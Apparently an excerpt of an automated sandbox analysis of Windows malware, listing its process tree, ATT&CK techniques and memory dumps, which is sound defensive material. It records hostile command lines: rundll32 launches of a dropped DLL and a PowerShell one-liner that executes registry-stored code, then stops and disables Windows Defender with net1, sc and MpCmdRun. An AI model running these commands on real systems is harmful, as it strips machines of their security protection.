C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 2402⤵
- Program crash
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 4483⤵
- Drops file in Windows directory
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6140 -ip 61401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4064 -ip 40641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3324 -ip 33241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4600 -ip 46001⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3612 -ip 36121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 6020 -ip 60201⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1560 -ip 15601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable2⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 47081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4872 -ip 48721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5872 -ip 58721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5684 -ip 56841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5124 -ip 51241⤵
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
- Enumerates system info in registry
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8064 -ip 80641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4040 -ip 40401⤵
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1900 -ip 19001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7392 -ip 73921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7548 -ip 75481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7636 -ip 76361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6952 -ip 69521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5392 -ip 53921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7068 -ip 70681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 6228 -ip 62281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2584 -ip 25841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7744 -ip 77441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4228 -ip 42281⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6084 -ip 60841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8176 -ip 81761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3720 -ip 37201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B29F9F4360D12340F07EA244CEFEB287 C2⤵
- Loads dropped DLL
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 460FDC7A8AAF9390C326F917C22A83352⤵
- Blocklisted process makes network request
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9404BF242CA3FE744486C9A444241478 E Global\MSI00002⤵
- Drops file in Windows directory
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5624 -ip 56241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3724 -ip 37241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 30840 -ip 308401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8252 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8252 -ip 82521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 31180 -ip 311801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 49716 -ip 497161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 50108 -ip 501081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7800 -ip 78001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11692 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 11692 -ip 116921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 31788 -ip 317881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31788 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8984 -ip 89841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9416 -ip 94161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 15296 -ip 152961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 696EC8317F1AD6D430553D680CB492CB C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8F80BB1F08EFA5062F88A107A13411DA2⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DA1590A7F56F3C7B60C2744088E5C861 E Global\MSI00002⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 48612 -ip 486121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 46192 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 46192 -ip 461921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 30588 -ip 305881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6428 -ip 64281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7364 -ip 73641⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9304 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 9304 -ip 93041⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5576 -ip 55761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 49868 -ip 498681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10628 -ip 106281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 8664 -ip 86641⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32976 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 32448 -ip 324481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 40452 -ip 404521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 39228 -ip 392281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 13208 -ip 132081⤵
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (3)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (11)
- Disabling Security Tools (5)
- Bypass User Account Control (1)
- Virtualization/Sandbox Evasion (1)
- Impair Defenses (1)
- Install Root Certificate (1)
Downloads
-
memory/3096-246-0x0000000006CB2000-0x0000000006CB3000-memory.dmpFilesize
4KB
-
memory/3096-257-0x0000000007BB0000-0x0000000007BB1000-memory.dmpFilesize
4KB
-
memory/3096-192-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/3132-252-0x0000000000000000-mapping.dmp
-
memory/3200-182-0x0000000000000000-mapping.dmp
-
memory/3232-453-0x0000000008580000-0x0000000008662000-memory.dmpFilesize
904KB
-
memory/3232-441-0x00000000075B0000-0x0000000007724000-memory.dmpFilesize
1.5MB
-
memory/3304-223-0x0000000000000000-mapping.dmp
-
memory/3324-549-0x0000000000770000-0x00000000007BC000-memory.dmpFilesize
304KB
-
memory/3324-213-0x0000000000000000-mapping.dmp
-
memory/3392-353-0x0000000000000000-mapping.dmp
-
memory/3424-184-0x0000000000000000-mapping.dmp
-
memory/3504-260-0x0000000000000000-mapping.dmp
-
memory/3504-286-0x0000000000700000-0x0000000000701000-memory.dmpFilesize
4KB
-
memory/3612-567-0x0000000000580000-0x0000000000588000-memory.dmpFilesize
32KB
-
memory/3612-224-0x0000000000000000-mapping.dmp
-
memory/3612-571-0x00000000005E0000-0x00000000005E9000-memory.dmpFilesize
36KB
-
memory/3652-248-0x0000000000BE0000-0x0000000000BE1000-memory.dmpFilesize
4KB
-
memory/3652-284-0x000000001B830000-0x000000001B832000-memory.dmpFilesize
8KB
-
memory/3652-238-0x0000000000000000-mapping.dmp
-
memory/3652-261-0x00000000013B0000-0x00000000013B1000-memory.dmpFilesize
4KB
-
memory/3720-186-0x0000000000000000-mapping.dmp
-
memory/3904-199-0x0000000000000000-mapping.dmp
-
memory/3940-463-0x00000000006B0000-0x00000000006D0000-memory.dmpFilesize
128KB
-
memory/3940-510-0x0000000005110000-0x0000000005466000-memory.dmpFilesize
3.3MB
-
memory/3940-476-0x0000000002FA0000-0x0000000002FC9000-memory.dmpFilesize
164KB
-
memory/3992-187-0x0000000000000000-mapping.dmp
-
memory/3992-356-0x0000000007435000-0x0000000007437000-memory.dmpFilesize
8KB
-
memory/3992-195-0x0000000004D60000-0x0000000004D61000-memory.dmpFilesize
4KB
-
memory/3992-428-0x000000007FDF0000-0x000000007FDF1000-memory.dmpFilesize
4KB
-
memory/3992-232-0x0000000007A70000-0x0000000007A71000-memory.dmpFilesize
4KB
-
memory/3992-244-0x0000000007432000-0x0000000007433000-memory.dmpFilesize
4KB
-
memory/3992-197-0x0000000004D60000-0x0000000004D61000-memory.dmpFilesize
4KB
-
memory/3992-221-0x0000000007430000-0x0000000007431000-memory.dmpFilesize
4KB
-
memory/4064-204-0x0000000000000000-mapping.dmp
-
memory/4088-212-0x0000000000000000-mapping.dmp
-
memory/4108-211-0x0000000000000000-mapping.dmp
-
memory/4120-189-0x0000000000000000-mapping.dmp
-
memory/4264-350-0x0000000000000000-mapping.dmp
-
memory/4600-218-0x0000000000000000-mapping.dmp
-
memory/4600-554-0x0000000000740000-0x000000000078A000-memory.dmpFilesize
296KB
-
memory/4600-552-0x0000000000710000-0x0000000000739000-memory.dmpFilesize
164KB
-
memory/4708-267-0x0000000004B40000-0x0000000004B41000-memory.dmpFilesize
4KB
-
memory/4708-226-0x0000000000000000-mapping.dmp
-
memory/4708-354-0x0000000000000000-mapping.dmp
-
memory/4708-275-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/4708-234-0x00000000000B0000-0x00000000000B1000-memory.dmpFilesize
4KB
-
memory/4708-241-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/4708-251-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/4716-352-0x0000000000000000-mapping.dmp
-
memory/4716-482-0x0000000001300000-0x0000000001656000-memory.dmpFilesize
3.3MB
-
memory/4716-434-0x0000000000E30000-0x0000000000E41000-memory.dmpFilesize
68KB
-
memory/4872-366-0x0000000000000000-mapping.dmp
-
memory/4880-152-0x0000000000000000-mapping.dmp
-
memory/4944-347-0x0000000000000000-mapping.dmp
-
memory/5056-167-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5056-173-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-169-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5056-176-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-171-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-172-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-170-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5056-153-0x0000000000000000-mapping.dmp
-
memory/5056-174-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/5056-175-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-178-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5056-168-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5056-177-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5124-280-0x0000000000000000-mapping.dmp
-
memory/5164-379-0x0000000002380000-0x0000000002381000-memory.dmpFilesize
4KB
-
memory/5164-499-0x0000000002384000-0x0000000002386000-memory.dmpFilesize
8KB
-
memory/5164-394-0x0000000002382000-0x0000000002383000-memory.dmpFilesize
4KB
-
memory/5164-403-0x0000000002383000-0x0000000002384000-memory.dmpFilesize
4KB
-
memory/5192-290-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5192-287-0x0000000000000000-mapping.dmp
-
memory/5248-513-0x00000000016C0000-0x0000000001A16000-memory.dmpFilesize
3.3MB
-
memory/5248-555-0x00000000013D0000-0x00000000013E1000-memory.dmpFilesize
68KB
-
memory/5256-493-0x0000000005DB0000-0x0000000005DB1000-memory.dmpFilesize
4KB
-
memory/5312-489-0x0000000000380000-0x00000000003A9000-memory.dmpFilesize
164KB
-
memory/5312-293-0x0000000000000000-mapping.dmp
-
memory/5312-530-0x0000000004740000-0x0000000004A96000-memory.dmpFilesize
3.3MB
-
memory/5312-310-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/5312-485-0x0000000000A80000-0x0000000000A99000-memory.dmpFilesize
100KB
-
memory/5384-297-0x0000000000000000-mapping.dmp
-
memory/5396-398-0x00000000049E0000-0x00000000049E1000-memory.dmpFilesize
4KB
-
memory/5396-351-0x0000000000000000-mapping.dmp
-
memory/5472-364-0x0000000000000000-mapping.dmp
-
memory/5516-308-0x0000000000000000-mapping.dmp
-
memory/5580-346-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/5580-314-0x0000000000000000-mapping.dmp
-
memory/5580-320-0x0000000000010000-0x0000000000011000-memory.dmpFilesize
4KB
-
memory/5580-331-0x0000000002180000-0x0000000002181000-memory.dmpFilesize
4KB
-
memory/5600-316-0x0000000000000000-mapping.dmp
-
memory/5612-361-0x0000000000000000-mapping.dmp
-
memory/5724-360-0x0000000000000000-mapping.dmp
-
memory/5740-524-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/5772-324-0x0000000000000000-mapping.dmp
-
memory/5800-338-0x0000000000900000-0x0000000000901000-memory.dmpFilesize
4KB
-
memory/5800-330-0x0000000000000000-mapping.dmp
-
memory/5808-389-0x0000000004E50000-0x0000000004EEC000-memory.dmpFilesize
624KB
-
memory/5808-359-0x0000000000000000-mapping.dmp
-
memory/5816-329-0x0000000000000000-mapping.dmp
-
memory/5848-506-0x0000000005EC0000-0x0000000005EC1000-memory.dmpFilesize
4KB
-
memory/5848-357-0x0000000000000000-mapping.dmp
-
memory/5860-332-0x0000000000000000-mapping.dmp
-
memory/5864-535-0x00000000053E0000-0x00000000053E1000-memory.dmpFilesize
4KB
-
memory/5904-363-0x0000000000000000-mapping.dmp
-
memory/5920-358-0x0000000000000000-mapping.dmp
-
memory/5920-469-0x0000000005370000-0x0000000005371000-memory.dmpFilesize
4KB
-
memory/5924-412-0x00000000054E0000-0x00000000054E1000-memory.dmpFilesize
4KB
-
memory/5924-342-0x0000000000000000-mapping.dmp
-
memory/6020-547-0x000000001AEB0000-0x000000001AEB2000-memory.dmpFilesize
8KB
-
memory/6176-540-0x0000000000760000-0x0000000000761000-memory.dmpFilesize
4KB
-
memory/6520-564-0x0000000002910000-0x0000000002912000-memory.dmpFilesize
8KB
-
memory/6732-570-0x0000000000980000-0x0000000000982000-memory.dmpFilesize
